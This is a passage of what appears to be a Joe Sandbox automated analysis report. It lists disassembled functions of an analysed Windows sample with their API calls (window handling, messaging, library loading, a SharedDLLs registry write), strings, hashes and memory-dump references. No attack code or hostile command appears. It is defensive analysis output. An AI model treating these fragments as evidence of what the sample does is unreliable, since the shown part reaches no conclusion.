                                                                                  • Opcode Fuzzy Hash: f5d2dec517d8fcf3ed16ce23875700f9c7cbaaadc8963f66ec064429c03deb44
                                                                                  • Instruction Fuzzy Hash: EA110436A00650B6DB1477778C07FDF262C9F85758F04401FF815A6182DF7D8B8242B9
                                                                                  Function 004D513C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 61stringwindowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 004D5141
                                                                                  • FormatMessageA.KERNEL32(00001100,00000000,?,00000800,00000000,00000000,00000000,00000000,?,0050A850,00000000,?,004D6034,00000000), ref: 004D51B1
                                                                                  • lstrcpyn.KERNEL32(4`M,00000000,?,?,0050A850,00000000,?,004D6034,00000000,?,?,?,?,00000000), ref: 004D51CD
                                                                                  • LocalFree.KERNEL32(?,?,0050A850,00000000,?,004D6034,00000000,?,?,?,?,00000000), ref: 004D51D6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: FormatFreeH_prologLocalMessagelstrcpyn
                                                                                  • String ID: 4`M
                                                                                  • API String ID: 1069405352-2981348052
                                                                                  • Opcode ID: 157e98ede2bc78de2510778445be6b5768956d1f99e5e9c01e45809ae474ee03
                                                                                  • Instruction ID: 1bb2a3673a5a32454d67734fba495c77a907b0a19305b266e55617993758da44
                                                                                  • Opcode Fuzzy Hash: 157e98ede2bc78de2510778445be6b5768956d1f99e5e9c01e45809ae474ee03
                                                                                  • Instruction Fuzzy Hash: 5C11D032900348AFDB108F95CC84BAF7BA8EB04750F10842BF9258A290DB749940CB98
                                                                                  Function 00410DF4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\SharedDLLs,00000000,0002001F,?), ref: 00410E11
                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?), ref: 00410E3B
                                                                                  • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004), ref: 00410E52
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00410E5B
                                                                                  Strings
                                                                                  • SOFTWARE\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00410E07
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: Value$CloseOpenQuery
                                                                                  • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                  • API String ID: 237177642-1156258849
                                                                                  • Opcode ID: 9387c27064908f673e5ff6aa4f9750783cc24fa336e05ee1e8cfe8b0d4ff9942
                                                                                  • Instruction ID: 9ffc6398569d184a4f32c3318d6706ccd97e3383b71f9fa0edc9d5125447ea87
                                                                                  • Opcode Fuzzy Hash: 9387c27064908f673e5ff6aa4f9750783cc24fa336e05ee1e8cfe8b0d4ff9942
                                                                                  • Instruction Fuzzy Hash: 6101E576900228BBDB10EF91DC49FEEBF7CEB14791F004066BA06A9051D7715B81DBA4
                                                                                  Function 0046CBF4 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 43COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0046CBF9
                                                                                    • Part of subcall function 004688E5: __EH_prolog.LIBCMT ref: 004688EA
                                                                                    • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                    • Part of subcall function 0045FEA5: __EH_prolog.LIBCMT ref: 0045FEAA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$lstrlen
                                                                                  • String ID: IDS_CTRL_HEADINGTEXT_BODY$IDS_CTRL_STATICTEXT_BODY$Title$Your text goes here.
                                                                                  • API String ID: 3243491680-687506183
                                                                                  • Opcode ID: 525c8266ca3ddf2e46b0d668a3e02e270a661406b98f022142d997e70473989d
                                                                                  • Instruction ID: 105b25ec1624ad8ba1d423fa81cba85b5b27e6adb824cc79459d558898aa8880
                                                                                  • Opcode Fuzzy Hash: 525c8266ca3ddf2e46b0d668a3e02e270a661406b98f022142d997e70473989d
                                                                                  • Instruction Fuzzy Hash: 200184B4A20609BBDF08BF59C917AEE7FB1EB05714F00421EF011621D2CBB81B4086EA
                                                                                  Function 0049CB80 Relevance: 7.8, APIs: 4, Strings: 1, Instructions: 309COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • TlsGetValue.KERNEL32(0000001C,00000005,?,?,?,0049DE6C,?), ref: 0049CB8D
                                                                                  Strings
                                                                                  • %02u/%02u/%02u %02u:%02u, xrefs: 0049CE64
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: Value
                                                                                  • String ID: %02u/%02u/%02u %02u:%02u
                                                                                  • API String ID: 3702945584-3598649713
                                                                                  • Opcode ID: d4e109c05d319f4413824bca8a8b348024662cad34a39dcea20a531305c0660d
                                                                                  • Instruction ID: ebbe4f52e660b47e4a3f7d3e3b5692c1a7f65e9970843013d5417d375fc9d7a0
                                                                                  • Opcode Fuzzy Hash: d4e109c05d319f4413824bca8a8b348024662cad34a39dcea20a531305c0660d
                                                                                  • Instruction Fuzzy Hash: AFB1D9B26007055BE720DF25E881BA7B7E4EF95314F04493FE95E87346DA39B408CB6A
                                                                                  Function 004087DB Relevance: 7.7, APIs: 5, Instructions: 240libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 004087E0
                                                                                  • LoadLibraryA.KERNEL32(00000001,0000000A), ref: 0040882F
                                                                                  • LoadLibraryExA.KERNEL32(00000002,00000000,00000008), ref: 00408843
                                                                                  • GetProcAddress.KERNEL32(?,?), ref: 00408862
                                                                                  • FreeLibrary.KERNEL32(00000001,?,?,?), ref: 00408A4F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: Library$Load$AddressFreeH_prologProc
                                                                                  • String ID:
                                                                                  • API String ID: 2839045223-0
                                                                                  • Opcode ID: 2e349856f6d3297eccab51125db814eb1e16c0bcb409ca026aaa6fcff38cab43
                                                                                  • Instruction ID: c7671ed60aab9ea2157ca98127249b64f00efbc9446199d525a1fb24186d32c1
                                                                                  • Opcode Fuzzy Hash: 2e349856f6d3297eccab51125db814eb1e16c0bcb409ca026aaa6fcff38cab43
                                                                                  • Instruction Fuzzy Hash: 87918271A01218EFDB04EBA4C985FEEBBB8AF14714F10406EF145B72C1DB785A44CB69
                                                                                  Function 004483D8 Relevance: 7.6, APIs: 5, Instructions: 100COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 004C9592: ShowWindow.USER32(?,?,004CA545,00000000,0000E146,00000000,?,?,0040A373), ref: 004C95A0
                                                                                  • GetWindowRect.USER32(?,?), ref: 00448402
                                                                                  • GetWindowRect.USER32(?,?), ref: 0044840B
                                                                                    • Part of subcall function 004CCC43: ScreenToClient.USER32(?,?), ref: 004CCC57
                                                                                    • Part of subcall function 004CCC43: ScreenToClient.USER32(?,?), ref: 004CCC60
                                                                                    • Part of subcall function 004C9502: MoveWindow.USER32(?,?,00000001,?,?,?,?,0040A7C9,?,?,?,?,00000001,?,00000000), ref: 004C951E
                                                                                  • RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,?,?,00000001,?), ref: 00448465
                                                                                  • GetWindowRect.USER32(?,?), ref: 00448494
                                                                                  • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 004484E7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Rect$ClientRedrawScreen$MoveShow
                                                                                  • String ID:
                                                                                  • API String ID: 3454447493-0
                                                                                  • Opcode ID: ae0968fc9ab66b3988928cf145baaa327219726bd97893d72e64fc6fb017e9af
                                                                                  • Instruction ID: 72597439327d3a54ffac366992c5cec3166725d11840ffc99d7e69c298594115
                                                                                  • Opcode Fuzzy Hash: ae0968fc9ab66b3988928cf145baaa327219726bd97893d72e64fc6fb017e9af
                                                                                  • Instruction Fuzzy Hash: 0F31F572A00219BFDF11DFE8CD85FEEB7B9FF08304F04451AE655A6190D674AD048B54
                                                                                  Function 004203E9 Relevance: 7.6, APIs: 5, Instructions: 91COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 004203EE
                                                                                    • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                  • __ftol.LIBCMT ref: 00420415
                                                                                  • __ftol.LIBCMT ref: 00420424
                                                                                    • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                    • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                    • Part of subcall function 00451AED: SendMessageA.USER32(?,0000014A,000000FF,?), ref: 00451B1A
                                                                                  • IsWindow.USER32(?), ref: 00420497
                                                                                  • InvalidateRect.USER32(?,-00000018,00000001,?,00000004,00000000,00000000,00000000), ref: 004204B8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$__ftol$IncrementInterlockedInvalidateMessageRectSendWindow
                                                                                  • String ID:
                                                                                  • API String ID: 4170118472-0
                                                                                  • Opcode ID: d446219621fe8f7652052798461b7db9ec6aa4f2d2671599cdbc535eaa0f53c1
                                                                                  • Instruction ID: b42f8c76adf6d359db629a225f1fa2b192ae5e4a515f5390625b3e2f98c09a52
                                                                                  • Opcode Fuzzy Hash: d446219621fe8f7652052798461b7db9ec6aa4f2d2671599cdbc535eaa0f53c1
                                                                                  • Instruction Fuzzy Hash: C3315671A00604BBCB10FF66CC46FEE77A8EF41718F00411EF511AB2D2DB799A408769
                                                                                  Function 00424CC9 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                  • __ftol.LIBCMT ref: 00424CF0
                                                                                  • __ftol.LIBCMT ref: 00424D02
                                                                                    • Part of subcall function 00424F3C: IsWindow.USER32(00000000), ref: 00424F51
                                                                                  • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 00424D45
                                                                                  • SendMessageA.USER32(?,00000402,?,00000000), ref: 00424D5B
                                                                                    • Part of subcall function 004C3979: SendMessageA.USER32(?,00000407,00000000,00000000), ref: 004C398C
                                                                                  • RedrawWindow.USER32(?,00000000,00000000,00000105,?,?), ref: 00424D88
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Window__ftol$H_prologRedraw
                                                                                  • String ID:
                                                                                  • API String ID: 617687098-0
                                                                                  • Opcode ID: 77c12837ae849ed413a644667bd1c046426289e555866154b049f46fffaa5cda
                                                                                  • Instruction ID: f2ffd363f7935d673814dcad69b2b97b1b40623e401794a0592b6f57f236fe88
                                                                                  • Opcode Fuzzy Hash: 77c12837ae849ed413a644667bd1c046426289e555866154b049f46fffaa5cda
                                                                                  • Instruction Fuzzy Hash: 1B218176A00218BFDB20AFE6DC81DAFB7BDEF44354F00446EF601A71A1D675AD418B64
                                                                                  Function 004209E6 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 004209EB
                                                                                    • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                  • __ftol.LIBCMT ref: 00420A11
                                                                                  • __ftol.LIBCMT ref: 00420A23
                                                                                  • IsWindow.USER32(?), ref: 00420A62
                                                                                  • SendMessageA.USER32(?,00000146,00000000,00000000), ref: 00420A7B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog__ftol$MessageSendWindow
                                                                                  • String ID:
                                                                                  • API String ID: 414663571-0
                                                                                  • Opcode ID: efdd515f9d05372d718f44b0e976e597e8fc7bbed5f5cbd5ed71d354cd82843f
                                                                                  • Instruction ID: 15610e2b9c88cca5bac40159eca9d8cd2d319130df8af0b2cf5214f4db6a270d
                                                                                  • Opcode Fuzzy Hash: efdd515f9d05372d718f44b0e976e597e8fc7bbed5f5cbd5ed71d354cd82843f
                                                                                  • Instruction Fuzzy Hash: 4821D631B1062AABDB11EBA2DC06FEE77A5EF50744F44001EF411AA1D2DB799E01876D
                                                                                  Function 004D006F Relevance: 7.6, APIs: 5, Instructions: 65windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 004C93E0: GetWindowLongA.USER32(?,000000F0), ref: 004C93EC
                                                                                  • SendMessageA.USER32(?,00000086,00000001,00000000), ref: 004D00C5
                                                                                  • SendMessageA.USER32(?,00000086,00000000,00000000), ref: 004D00D9
                                                                                  • GetDesktopWindow.USER32 ref: 004D00DD
                                                                                  • GetWindow.USER32(00000000), ref: 004D00EA
                                                                                  • SendMessageA.USER32(00000000,0000036D,?,00000000), ref: 004D010B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSendWindow$DesktopLong
                                                                                  • String ID:
                                                                                  • API String ID: 2272707703-0
                                                                                  • Opcode ID: 1131a1708b74ccad1336aeaf282ed9e93aa14ea3fd261bd180f39a217d07f1f8
                                                                                  • Instruction ID: 583736b8da9e0b1798ce243969eb572105080746a9121ccc4b00157a2fb63cfa
                                                                                  • Opcode Fuzzy Hash: 1131a1708b74ccad1336aeaf282ed9e93aa14ea3fd261bd180f39a217d07f1f8
                                                                                  • Instruction Fuzzy Hash: F6113231201B1273E3331622AC66F2FBA45AF41BA4F05412FF6412B3D2CF9ADC0182AD
                                                                                  Function 004D09B1 Relevance: 7.6, APIs: 5, Instructions: 57windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GlobalGetAtomNameA.KERNEL32(?,?,00000103), ref: 004D0A13
                                                                                  • GlobalAddAtomA.KERNEL32(?), ref: 004D0A22
                                                                                  • GlobalGetAtomNameA.KERNEL32(?,?,00000103), ref: 004D0A38
                                                                                  • GlobalAddAtomA.KERNEL32(?), ref: 004D0A41
                                                                                  • SendMessageA.USER32(?,000003E4,?,?), ref: 004D0A65
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: AtomGlobal$Name$MessageSend
                                                                                  • String ID:
                                                                                  • API String ID: 1515195355-0
                                                                                  • Opcode ID: 46ecb545ac0a4ce1fa19fd15e6d59622c091c330353c892be25fb7f7b1e019ff
                                                                                  • Instruction ID: c178a7f9b264245205d65ae93b38186fc3cd1e9163872f36e5ba7fa38ea75c83
                                                                                  • Opcode Fuzzy Hash: 46ecb545ac0a4ce1fa19fd15e6d59622c091c330353c892be25fb7f7b1e019ff
                                                                                  • Instruction Fuzzy Hash: EA119475D00718AADB20EF64CC54BEBB3BCEB14740F404457E59597241E7B8ABC1CB64
                                                                                  Function 0046CEFA Relevance: 7.6, APIs: 5, Instructions: 50windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetClientRect.USER32(?,?), ref: 0046CF11
                                                                                  • GetWindowRect.USER32(?,?), ref: 0046CF27
                                                                                    • Part of subcall function 004CCC43: ScreenToClient.USER32(?,?), ref: 004CCC57
                                                                                    • Part of subcall function 004CCC43: ScreenToClient.USER32(?,?), ref: 004CCC60
                                                                                    • Part of subcall function 004C932E: GetDlgItem.USER32(?,?), ref: 004C933C
                                                                                  • GetWindowRect.USER32(?,?), ref: 0046CF44
                                                                                  • LoadIconA.USER32(?,00000073), ref: 0046CF6A
                                                                                  • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0046CF7B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
